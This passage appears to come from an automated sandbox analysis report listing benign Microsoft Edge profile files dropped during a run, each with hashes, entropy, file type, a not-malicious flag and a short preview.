                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                    Entropy (8bit):5.256170343784151
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:7rS+vYfYebvqBZFUtVV//hV5JfYebvqBaJ:7rjYfYebvygV1hJfYebvL
                                                                                                                                                                                    MD5:358B4E65C8F324736AC9EA38C14E0998
                                                                                                                                                                                    SHA1:1276A53B52BB6A5FBEE524E42D2C48A3BB6D6CF5
                                                                                                                                                                                    SHA-256:670803C81316AB7CCF13EAE1325CB736F46B9D448511F767D7A694CE7D4E3E06
                                                                                                                                                                                    SHA-512:7AA41B57C2B9C580C4416DBE9BA75A3D1030E76DD9B5FB4960263D8F071507FFB721E756E62A589AEF05FBA29CCF73D647D472ECC7D076AA8C5300D13A9992F8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:17.866 13dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-09:30:17.867 13dc Recovering log #3.2025/01/09-09:30:17.870 13dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                    Entropy (8bit):5.256170343784151
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:7rS+vYfYebvqBZFUtVV//hV5JfYebvqBaJ:7rjYfYebvygV1hJfYebvL
                                                                                                                                                                                    MD5:358B4E65C8F324736AC9EA38C14E0998
                                                                                                                                                                                    SHA1:1276A53B52BB6A5FBEE524E42D2C48A3BB6D6CF5
                                                                                                                                                                                    SHA-256:670803C81316AB7CCF13EAE1325CB736F46B9D448511F767D7A694CE7D4E3E06
                                                                                                                                                                                    SHA-512:7AA41B57C2B9C580C4416DBE9BA75A3D1030E76DD9B5FB4960263D8F071507FFB721E756E62A589AEF05FBA29CCF73D647D472ECC7D076AA8C5300D13A9992F8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:17.866 13dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-09:30:17.867 13dc Recovering log #3.2025/01/09-09:30:17.870 13dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):326
                                                                                                                                                                                    Entropy (8bit):5.151635274018527
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrZUkN+q2Pwkn23oH+TcwtpIFUtJZUCZZmwPZURLRVkwOwkn23oH+Tcwta/WLJ:7jIvYfYebmFUtnZ/yj5JfYebaUJ
                                                                                                                                                                                    MD5:FA925902FD676E751E01613E486EC6DD
                                                                                                                                                                                    SHA1:FBE4B9AA0BB51FE2BDB82F67A42FB60E3624055A
                                                                                                                                                                                    SHA-256:BFABB4698AB9A0B6B9FF736B1E84EE61C0F17D5449B926CAB5F32C2D2946FC1D
                                                                                                                                                                                    SHA-512:C47D8FAF57546972C1F3E402787191517002A83D425C74B73A2CD6F6FCD356A46A5CA1C3E80B4BDB8D31E61E695BAC1B850ACFBCF1D30FF263648B50E564F6F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.311 1af8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-09:30:01.313 1af8 Recovering log #3.2025/01/09-09:30:01.314 1af8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):326
                                                                                                                                                                                    Entropy (8bit):5.151635274018527
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrZUkN+q2Pwkn23oH+TcwtpIFUtJZUCZZmwPZURLRVkwOwkn23oH+Tcwta/WLJ:7jIvYfYebmFUtnZ/yj5JfYebaUJ
                                                                                                                                                                                    MD5:FA925902FD676E751E01613E486EC6DD
                                                                                                                                                                                    SHA1:FBE4B9AA0BB51FE2BDB82F67A42FB60E3624055A
                                                                                                                                                                                    SHA-256:BFABB4698AB9A0B6B9FF736B1E84EE61C0F17D5449B926CAB5F32C2D2946FC1D
                                                                                                                                                                                    SHA-512:C47D8FAF57546972C1F3E402787191517002A83D425C74B73A2CD6F6FCD356A46A5CA1C3E80B4BDB8D31E61E695BAC1B850ACFBCF1D30FF263648B50E564F6F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.311 1af8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-09:30:01.313 1af8 Recovering log #3.2025/01/09-09:30:01.314 1af8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                    Entropy (8bit):0.26707851465859517
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                    MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                    SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                    SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                    SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):131072
                                                                                                                                                                                    Entropy (8bit):0.007848920143343801
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:ImtV+wj/l/7+plDKQllxiYM2fOtl+FFt:IiV+W/QWQlHPfOtc
                                                                                                                                                                                    MD5:6215B5AE972B6364FA9145914892E2E0
                                                                                                                                                                                    SHA1:115D8A7FC67E7ABBA6AA7FA1217668D397B1F8DC
                                                                                                                                                                                    SHA-256:BF62C3A5A3AF89FAC33D18D7C89BDFE10EF71FCC8FBE0B058450A240D8D160FE
                                                                                                                                                                                    SHA-512:F593B7D3B44CC898538FDF896958627B4C800266BCEC1601A600FB188760A3E23E38C8F1F47C158991B102472FB00B61CF2E98F6C3CB9947AC2D4061AF1D5C49
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:VLnk.....?.........u.6Q..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................*$I............................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):184320
                                                                                                                                                                                    Entropy (8bit):1.0670995166823196
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:QSqzWMMUfTNnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYnR9n6:QrzWMffxnzkkqtXnTK+hNH+5EVum0
                                                                                                                                                                                    MD5:A7466561647661D7560B10452F764DC6
                                                                                                                                                                                    SHA1:47155334A4EC015D22FB7954DFD4D17AAD0766AF
                                                                                                                                                                                    SHA-256:8B0D0786F3E166D05A436A2E133F000FACD2A80AC32EB33D2A714762D523FAC4
                                                                                                                                                                                    SHA-512:21254BD081AD3C77C1C2D93D898800390DBD9B1A4C4747F24DEC809388878BFE887B8ABB7FF4AE445163B2910E5B9817904E518EC1DC4246F4D51F4E64D73FBA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):14336
                                                                                                                                                                                    Entropy (8bit):1.7612637051712483
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:PtSjGhp22iSauqCr3PGXRWCrhP5PaRWCr4P/xI1XRtaRP:g8+Ry48ql
                                                                                                                                                                                    MD5:4B584A2D85D04B53D18D06A689730642
                                                                                                                                                                                    SHA1:62E5C41308807F57B2A80C62AF27E035F507E06B
                                                                                                                                                                                    SHA-256:334640A8780633C74A6B519E07A0741880103E4FCE95493980E817B9CFBE9697
                                                                                                                                                                                    SHA-512:F5D1414873452F4A24F0964CB0A9E94856FCB6525B7E3DC367A50843C67A87137F826AC1C2F068B8085F4A121BD0EDEAAA2A357F60F03AE2A018D2EA63E1EE5D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                    Entropy (8bit):0.41235120905181716
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                    MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                    SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                    SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                    SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13037
                                                                                                                                                                                    Entropy (8bit):5.166255948014639
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjgjCYWs8/pj+FDlQAy4b1f:sVgLAJu6JFjSopUJQbI
                                                                                                                                                                                    MD5:B53437F8C6DED91DBBF19E5D0F42D5A3
                                                                                                                                                                                    SHA1:70FA256D7EFACB52191ECEAA81D8729BDC24A388
                                                                                                                                                                                    SHA-256:DC88D32B2AB9DAFDE691451422B18AADA0366B09B5013DCCABCBF6C088D484AC
                                                                                                                                                                                    SHA-512:A0B3ED62C888F54A32970A856E85A35EE777FD053D94160BFB04BB23C9D3E3F82DED280D3C80E78AF010C1F5B2D215590FA6B786228AA640F5FAEF6BB40617E3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                    Entropy (8bit):0.35226517389931394
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                    MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                    SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                    SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                    SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                    Entropy (8bit):0.08349736726336807
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:GbB4vxhlbB4vx589XHl/Vl/Ukl/Vl/Vl/Ukl/Vl/Vl/Vl/Vl/Vl/Vl/Fl8ArHlyO:aOvxzbOvx5sFnnnnnnnnnnnH8MrbN
                                                                                                                                                                                    MD5:66DB487971E17A5FF13CB3402A8956A9
                                                                                                                                                                                    SHA1:879C9F13C07D20499CE19A41BB6F2945850A2CE1
                                                                                                                                                                                    SHA-256:34DC8EA9886BBFE863FA0223429A72E531BECC5E5E595100348F05FB6091EA1B
                                                                                                                                                                                    SHA-512:6EF4A8F3E3288E57D53429BE0D885D2662368282C5AC4C934BE7AF68EC142EB1C3A9BFE0C61E9AACD010E00948628A22E90D5E7BBA6E66E88A442E45A472EB25
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:..-.............8........e.A.....].R.-...H.t%.L...-.............8........e.A.....].R.-...H.t%.L.........4...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):230752
                                                                                                                                                                                    Entropy (8bit):0.7600495030093588
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:keEumS+uQzViMX1HxQZ2pXGdAgKujO/6jjjOn:kXumS+/iMXNxQZ2pXGSgKuiOj8
                                                                                                                                                                                    MD5:97CB530735C2C4268AAEA88EE8EB6B00
                                                                                                                                                                                    SHA1:669C8A2D3AEBF7BAB8ED41FB58BCDE8BA9773DE0
                                                                                                                                                                                    SHA-256:9B63284FCB4CC220BF7D92CBB6A01117FB3D1181F626EDEB8FCD0B6C039B5085
                                                                                                                                                                                    SHA-512:EBF4AE4E10B56F4143610D15D78D558BF87A39BAA85E157538E1A9A26B75223E2304E06D74DA898E0AEE0922B33A4F433F0A660FE46AAECD5B5DCC83F5FE088E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:7....-...........].R.-..&.a...e..........].R.-..#...ZGv.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):221
                                                                                                                                                                                    Entropy (8bit):4.592463688691681
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:VVXntjQPEnjQ0Okm//3r6P/FDdllM/MO2cKP4ltlfseGKT9rcQ6xhaIL1FUL1:/XntM+0vX3illsEClPsedhO8IE
                                                                                                                                                                                    MD5:2F87CE890BF06190401674540F2BCA8F
                                                                                                                                                                                    SHA1:C0C2ADE43B4E2E2B023B7ADF51EAA0F18550F0B2
                                                                                                                                                                                    SHA-256:42FE71B1151A38B8614534D93FB17542936314D06764EF059344C3608895A238
                                                                                                                                                                                    SHA-512:D61614FCFBB6BCE26CCE0990B23362F656FD9791585E9F77DACAA676F4A83F094B45AD0AD923629A8D248B1F27B1477A6E21050D94E395A49DA7CE137E5F8D55
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:A..r.................20_1_1...1.,U.................20_1_1...1..R>;...............#38_h.......6.Z..W.F......nq......nq.........8&B.0................39_config..........6.....n ....1V.e................V.e................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
